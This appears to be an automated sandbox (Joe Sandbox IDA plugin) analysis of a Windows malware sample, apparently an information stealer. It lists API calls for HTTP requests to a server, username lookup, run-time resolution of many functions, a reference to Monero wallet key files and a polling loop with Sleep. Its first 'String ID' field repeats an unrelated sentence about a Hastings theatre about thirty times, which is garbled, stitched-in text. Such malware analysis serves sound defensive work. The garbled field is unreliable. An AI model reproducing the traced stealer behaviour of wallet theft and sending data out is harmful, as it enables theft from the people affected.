                                • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the 
United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                • API String ID: 1542196881-2218711628
                                • Opcode ID: 5e47cb601431c053e59ca8a0b17e8a17c8dbf87a6d91f932ea96763a938f9408
                                • Instruction ID: eee41650ef6be6f250626e8122ac4ae05a043f4fe348f634d03a467a385645c3
                                • Opcode Fuzzy Hash: 5e47cb601431c053e59ca8a0b17e8a17c8dbf87a6d91f932ea96763a938f9408
                                • Instruction Fuzzy Hash: C641F6606C66047EE63CBFE49C42DFF76566F47709F505289BE407A380CBF06B2045A6

                                Control-flow Graph (rendered graph not captured in this extraction; legend: Executed / Not Executed; entry block 84880-84942)
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                  • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00084915
                                • StrCmpCA.SHLWAPI(?,00D0F398), ref: 0008493A
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00084ABA
                                • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,000A0DDB,00000000,?,?,00000000,?,",00000000,?,00D0F418), ref: 00084DE8
                                • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00084E04
                                • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00084E18
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00084E49
                                • InternetCloseHandle.WININET(00000000), ref: 00084EAD
                                • InternetCloseHandle.WININET(00000000), ref: 00084EC5
                                • HttpOpenRequestA.WININET(00000000,00D0F3A8,?,00D0EDF8,00000000,00000000,00400100,00000000), ref: 00084B15
                                  • Part of subcall function 0009A9B0: lstrlen.KERNEL32(?,00D08A50,?,\Monero\wallet.keys,000A0E17), ref: 0009A9C5
                                  • Part of subcall function 0009A9B0: lstrcpy.KERNEL32(00000000), ref: 0009AA04
                                  • Part of subcall function 0009A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0009AA12
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 0009A920: lstrcpy.KERNEL32(00000000,?), ref: 0009A972
                                  • Part of subcall function 0009A920: lstrcat.KERNEL32(00000000), ref: 0009A982
                                • InternetCloseHandle.WININET(00000000), ref: 00084ECF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                • String ID: "$"$------$------$------
                                • API String ID: 460715078-2180234286
                                • Opcode ID: a624af047b8fece6097a8ed78d238438dda7284ed3aed18ebaa4a40c40d31f87
                                • Instruction ID: 4c18cf2490dd39e7c8b13e000ce1ed5bf9e26f55d42465214fb459e36855241e
                                • Opcode Fuzzy Hash: a624af047b8fece6097a8ed78d238438dda7284ed3aed18ebaa4a40c40d31f87
                                • Instruction Fuzzy Hash: 5312CF71A20118AADF15EB90DC96FEEB379BF16300F504199B10676092EF702F49DFA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000811B7), ref: 00097880
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00097887
                                • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0009789F
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateNameProcessUser
                                • String ID:
                                • API String ID: 1296208442-0
                                • Opcode ID: 614b0fcd994c3d83917f759b487050d431e94c03b0cbe90959e3784c8547d5e9
                                • Instruction ID: a8bae039c7c2b01d4bbbdb59434ce0e10438c5f3eea8fc606210a8fa597c2efc
                                • Opcode Fuzzy Hash: 614b0fcd994c3d83917f759b487050d431e94c03b0cbe90959e3784c8547d5e9
                                • Instruction Fuzzy Hash: 19F04FB1944208EBCB10DF99ED4AFAEFBB8FB04715F10025AFA05A2680C77815048BA1
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitInfoProcessSystem
                                • String ID:
                                • API String ID: 752954902-0
                                • Opcode ID: 9ef3ce689785a444d22c596ed9b6314c0b79ae63f1b4e4aa65fa001f3d2e59dc
                                • Instruction ID: 416f94bce9d38f5526209010d0599e43a6356f42bdb776f5bc85f33f1fdb1f7f
                                • Opcode Fuzzy Hash: 9ef3ce689785a444d22c596ed9b6314c0b79ae63f1b4e4aa65fa001f3d2e59dc
                                • Instruction Fuzzy Hash: F5D09E7490430CDBCB04EFE0ED8DADDBB78FB08715F101555D90562340EA315596CBA6

                                Control-flow Graph (rendered graph not captured in this extraction; legend: Executed / Not Executed; entry block 99c10-99c1a)
                                APIs
                                • GetProcAddress.KERNEL32(77190000,00CF5230), ref: 00099C2D
                                • GetProcAddress.KERNEL32(77190000,00CF5310), ref: 00099C45
                                • GetProcAddress.KERNEL32(77190000,00D09040), ref: 00099C5E
                                • GetProcAddress.KERNEL32(77190000,00D08FF8), ref: 00099C76
                                • GetProcAddress.KERNEL32(77190000,00D09058), ref: 00099C8E
                                • GetProcAddress.KERNEL32(77190000,00D0D5C8), ref: 00099CA7
                                • GetProcAddress.KERNEL32(77190000,00CFA5D0), ref: 00099CBF
                                • GetProcAddress.KERNEL32(77190000,00D0D3A0), ref: 00099CD7
                                • GetProcAddress.KERNEL32(77190000,00D0D358), ref: 00099CF0
                                • GetProcAddress.KERNEL32(77190000,00D0D370), ref: 00099D08
                                • GetProcAddress.KERNEL32(77190000,00D0D568), ref: 00099D20
                                • GetProcAddress.KERNEL32(77190000,00CF5030), ref: 00099D39
                                • GetProcAddress.KERNEL32(77190000,00CF50D0), ref: 00099D51
                                • GetProcAddress.KERNEL32(77190000,00CF5330), ref: 00099D69
                                • GetProcAddress.KERNEL32(77190000,00CF5050), ref: 00099D82
                                • GetProcAddress.KERNEL32(77190000,00D0D448), ref: 00099D9A
                                • GetProcAddress.KERNEL32(77190000,00D0D538), ref: 00099DB2
                                • GetProcAddress.KERNEL32(77190000,00CFA760), ref: 00099DCB
                                • GetProcAddress.KERNEL32(77190000,00CF52D0), ref: 00099DE3
                                • GetProcAddress.KERNEL32(77190000,00D0D628), ref: 00099DFB
                                • GetProcAddress.KERNEL32(77190000,00D0D5E0), ref: 00099E14
                                • GetProcAddress.KERNEL32(77190000,00D0D460), ref: 00099E2C
                                • GetProcAddress.KERNEL32(77190000,00D0D478), ref: 00099E44
                                • GetProcAddress.KERNEL32(77190000,00CF5290), ref: 00099E5D
                                • GetProcAddress.KERNEL32(77190000,00D0D4C0), ref: 00099E75
                                • GetProcAddress.KERNEL32(77190000,00D0D490), ref: 00099E8D
                                • GetProcAddress.KERNEL32(77190000,00D0D340), ref: 00099EA6
                                • GetProcAddress.KERNEL32(77190000,00D0D388), ref: 00099EBE
                                • GetProcAddress.KERNEL32(77190000,00D0D5F8), ref: 00099ED6
                                • GetProcAddress.KERNEL32(77190000,00D0D3B8), ref: 00099EEF
                                • GetProcAddress.KERNEL32(77190000,00D0D3E8), ref: 00099F07
                                • GetProcAddress.KERNEL32(77190000,00D0D550), ref: 00099F1F
                                • GetProcAddress.KERNEL32(77190000,00D0D4F0), ref: 00099F38
                                • GetProcAddress.KERNEL32(77190000,00CFFAE0), ref: 00099F50
                                • GetProcAddress.KERNEL32(77190000,00D0D598), ref: 00099F68
                                • GetProcAddress.KERNEL32(77190000,00D0D4D8), ref: 00099F81
                                • GetProcAddress.KERNEL32(77190000,00CF52F0), ref: 00099F99
                                • GetProcAddress.KERNEL32(77190000,00D0D520), ref: 00099FB1
                                • GetProcAddress.KERNEL32(77190000,00CF50B0), ref: 00099FCA
                                • GetProcAddress.KERNEL32(77190000,00D0D580), ref: 00099FE2
                                • GetProcAddress.KERNEL32(77190000,00D0D610), ref: 00099FFA
                                • GetProcAddress.KERNEL32(77190000,00CF5170), ref: 0009A013
                                • GetProcAddress.KERNEL32(77190000,00CF5190), ref: 0009A02B
                                • LoadLibraryA.KERNEL32(00D0D4A8,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A03D
                                • LoadLibraryA.KERNEL32(00D0D3D0,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A04E
                                • LoadLibraryA.KERNEL32(00D0D400,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A060
                                • LoadLibraryA.KERNEL32(00D0D418,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A072
                                • LoadLibraryA.KERNEL32(00D0D5B0,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A083
                                • LoadLibraryA.KERNEL32(00D0D430,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A095
                                • LoadLibraryA.KERNEL32(00D0D508,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A0A7
                                • LoadLibraryA.KERNEL32(00D0D7D8,?,00095CA3,000A0AEB,?,?,?,?,?,?,?,?,?,?,000A0AEA,000A0AE3), ref: 0009A0B8
                                • GetProcAddress.KERNEL32(77040000,00CF51B0), ref: 0009A0DA
                                • GetProcAddress.KERNEL32(77040000,00D0D7F0), ref: 0009A0F2
                                • GetProcAddress.KERNEL32(77040000,00D08C60), ref: 0009A10A
                                • GetProcAddress.KERNEL32(77040000,00D0D640), ref: 0009A123
                                • GetProcAddress.KERNEL32(77040000,00CF51F0), ref: 0009A13B
                                • GetProcAddress.KERNEL32(704D0000,00CFA5F8), ref: 0009A160
                                • GetProcAddress.KERNEL32(704D0000,00CF5410), ref: 0009A179
                                • GetProcAddress.KERNEL32(704D0000,00CFA878), ref: 0009A191
                                • GetProcAddress.KERNEL32(704D0000,00D0D7C0), ref: 0009A1A9
                                • GetProcAddress.KERNEL32(704D0000,00D0D6E8), ref: 0009A1C2
                                • GetProcAddress.KERNEL32(704D0000,00CF5450), ref: 0009A1DA
                                • GetProcAddress.KERNEL32(704D0000,00CF5650), ref: 0009A1F2
                                • GetProcAddress.KERNEL32(704D0000,00D0D658), ref: 0009A20B
                                • GetProcAddress.KERNEL32(768D0000,00CF53B0), ref: 0009A22C
                                • GetProcAddress.KERNEL32(768D0000,00CF5430), ref: 0009A244
                                • GetProcAddress.KERNEL32(768D0000,00D0D700), ref: 0009A25D
                                • GetProcAddress.KERNEL32(768D0000,00D0D670), ref: 0009A275
                                • GetProcAddress.KERNEL32(768D0000,00CF5470), ref: 0009A28D
                                • GetProcAddress.KERNEL32(75790000,00CFA4B8), ref: 0009A2B3
                                • GetProcAddress.KERNEL32(75790000,00CFA6C0), ref: 0009A2CB
                                • GetProcAddress.KERNEL32(75790000,00D0D688), ref: 0009A2E3
                                • GetProcAddress.KERNEL32(75790000,00CF5610), ref: 0009A2FC
                                • GetProcAddress.KERNEL32(75790000,00CF54B0), ref: 0009A314
                                • GetProcAddress.KERNEL32(75790000,00CFA710), ref: 0009A32C
                                • GetProcAddress.KERNEL32(75A10000,00D0D718), ref: 0009A352
                                • GetProcAddress.KERNEL32(75A10000,00CF5490), ref: 0009A36A
                                • GetProcAddress.KERNEL32(75A10000,00D08B50), ref: 0009A382
                                • GetProcAddress.KERNEL32(75A10000,00D0D730), ref: 0009A39B
                                • GetProcAddress.KERNEL32(75A10000,00D0D6A0), ref: 0009A3B3
                                • GetProcAddress.KERNEL32(75A10000,00CF56F0), ref: 0009A3CB
                                • GetProcAddress.KERNEL32(75A10000,00CF5670), ref: 0009A3E4
                                • GetProcAddress.KERNEL32(75A10000,00D0D6D0), ref: 0009A3FC
                                • GetProcAddress.KERNEL32(75A10000,00D0D748), ref: 0009A414
                                • GetProcAddress.KERNEL32(76850000,00CF55F0), ref: 0009A436
                                • GetProcAddress.KERNEL32(76850000,00D0D778), ref: 0009A44E
                                • GetProcAddress.KERNEL32(76850000,00D0D6B8), ref: 0009A466
                                • GetProcAddress.KERNEL32(76850000,00D0D760), ref: 0009A47F
                                • GetProcAddress.KERNEL32(76850000,00D0D790), ref: 0009A497
                                • GetProcAddress.KERNEL32(75690000,00CF5630), ref: 0009A4B8
                                • GetProcAddress.KERNEL32(75690000,00CF5390), ref: 0009A4D1
                                • GetProcAddress.KERNEL32(769C0000,00CF54F0), ref: 0009A4F2
                                • GetProcAddress.KERNEL32(769C0000,00D0D7A8), ref: 0009A50A
                                • GetProcAddress.KERNEL32(6F8C0000,00CF55D0), ref: 0009A530
                                • GetProcAddress.KERNEL32(6F8C0000,00CF5550), ref: 0009A548
                                • GetProcAddress.KERNEL32(6F8C0000,00CF5710), ref: 0009A560
                                • GetProcAddress.KERNEL32(6F8C0000,00D0D0A0), ref: 0009A579
                                • GetProcAddress.KERNEL32(6F8C0000,00CF5510), ref: 0009A591
                                • GetProcAddress.KERNEL32(6F8C0000,00CF56B0), ref: 0009A5A9
                                • GetProcAddress.KERNEL32(6F8C0000,00CF53D0), ref: 0009A5C2
                                • GetProcAddress.KERNEL32(6F8C0000,00CF5530), ref: 0009A5DA
                                • GetProcAddress.KERNEL32(6F8C0000,InternetSetOptionA), ref: 0009A5F1
                                • GetProcAddress.KERNEL32(6F8C0000,HttpQueryInfoA), ref: 0009A607
                                • GetProcAddress.KERNEL32(75D90000,00D0D268), ref: 0009A629
                                • GetProcAddress.KERNEL32(75D90000,00D08C50), ref: 0009A641
                                • GetProcAddress.KERNEL32(75D90000,00D0D118), ref: 0009A659
                                • GetProcAddress.KERNEL32(75D90000,00D0D0B8), ref: 0009A672
                                • GetProcAddress.KERNEL32(76470000,00CF5570), ref: 0009A693
                                • GetProcAddress.KERNEL32(6D900000,00D0D088), ref: 0009A6B4
                                • GetProcAddress.KERNEL32(6D900000,00CF5690), ref: 0009A6CD
                                • GetProcAddress.KERNEL32(6D900000,00D0D298), ref: 0009A6E5
                                • GetProcAddress.KERNEL32(6D900000,00D0D0D0), ref: 0009A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1339111193.0000000000081000.00000040.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                 • Associated: 00000004.00000002.1339091795.0000000000080000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000131000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.000000000013D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.0000000000162000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339111193.00000000002CA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.00000000002DE000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000463000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000053D000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000567000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339249121.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339477199.0000000000576000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339575318.000000000070E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000004.00000002.1339589373.000000000070F000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 378d0f5d3daa4153ddcbc52ebe7561bca3c46eeb99c70a7992f6ae28b8beecad
                                • Instruction ID: 78bf24dfea621ae367f77698703bb4e81ba6fc1d1631229e38bf19e7ff023af7
                                • Opcode Fuzzy Hash: 378d0f5d3daa4153ddcbc52ebe7561bca3c46eeb99c70a7992f6ae28b8beecad
                                • Instruction Fuzzy Hash: 62627EB5601288AFC344DFA8FD8CD6AB7F9F78C309314861AA609C7234D7399859DF52

                                 Control-flow Graph (rendered graph omitted; executed/not-executed colouring lost in extraction; node data recovered): 86280 InternetOpenA, StrCmpCA → 8631e InternetConnectA → 86364 HttpOpenRequestA → 8639e InternetSetOptionA (bypassed on one branch) → 863c5 HttpSendRequestA, HttpQueryInfoA → 8642c call 98940 → 86456 InternetReadFile, where 8648d (call 9a9b0, 9a8a0, 9a800) loops back to 86456 and 8648b leaves the loop → 864c7, 864f5, 864ff InternetCloseHandle → 86509. The failure branches at 86407 and 864c9 (call 9a740, 9a800 ×2) and the normal path all join at 86528.
                                APIs
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00084839
                                  • Part of subcall function 000847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00084849
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • InternetOpenA.WININET(000A0DFE,00000001,00000000,00000000,00000000), ref: 000862E1
                                • StrCmpCA.SHLWAPI(?,00D0F398), ref: 00086303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00086335
                                • HttpOpenRequestA.WININET(00000000,GET,?,00D0EDF8,00000000,00000000,00400100,00000000), ref: 00086385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000863BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000863D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 000863FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0008646D
                                • InternetCloseHandle.WININET(00000000), ref: 000864EF
                                • InternetCloseHandle.WININET(00000000), ref: 000864F9
                                • InternetCloseHandle.WININET(00000000), ref: 00086503
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 5bf8066a46afedb18af19818aae1c0f4498486121970cc8fc671567da87c0eab
                                • Instruction ID: 41455f1b72bcb1ff831e1698f0a75cfab96611eb94c8e9beec5bf36a60018942
                                • Opcode Fuzzy Hash: 5bf8066a46afedb18af19818aae1c0f4498486121970cc8fc671567da87c0eab
                                • Instruction Fuzzy Hash: DA715071A00218ABDF24EFA0DC49FEEB7B4FB45704F108158F10A6B191DBB56A89DF91

                                 Control-flow Graph (rendered graph omitted; executed/not-executed colouring lost in extraction; node data recovered): entry 95510 (call 95ad0, 9a820 ×3, 9a740 ×4) → loop head 9557c. Three stages repeat the same shape: build a request through 81590 and 951f0 or 952c0, then StrCmpCA against ERROR at 95644/956a1, 9578b/95857 and 95940/95a0c. Each stage either falls into a handler (957dc, 95991, 95a28: call 81670, 96560, 81550) that exits at 95ac3, or, after the last compare, reaches 95a16 Sleep and jumps back to the loop head at 9557c.
                                APIs
                                  • Part of subcall function 0009A820: lstrlen.KERNEL32(00084F05,?,?,00084F05,000A0DDE), ref: 0009A82B
                                  • Part of subcall function 0009A820: lstrcpy.KERNEL32(000A0DDE,00000000), ref: 0009A885
                                  • Part of subcall function 0009A740: lstrcpy.KERNEL32(000A0E17,00000000), ref: 0009A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 000956A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095857
                                  • Part of subcall function 0009A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0009A7E6
                                  • Part of subcall function 000951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095228
                                  • Part of subcall function 0009A8A0: lstrcpy.KERNEL32(?,000A0E17), ref: 0009A905
                                  • Part of subcall function 000952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095318
                                  • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 0009532F
                                  • Part of subcall function 000952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00095364
                                  • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 00095383
                                  • Part of subcall function 000952C0: lstrlen.KERNEL32(00000000), ref: 000953AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0009578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00095940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00095A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00095A1B
                                Strings
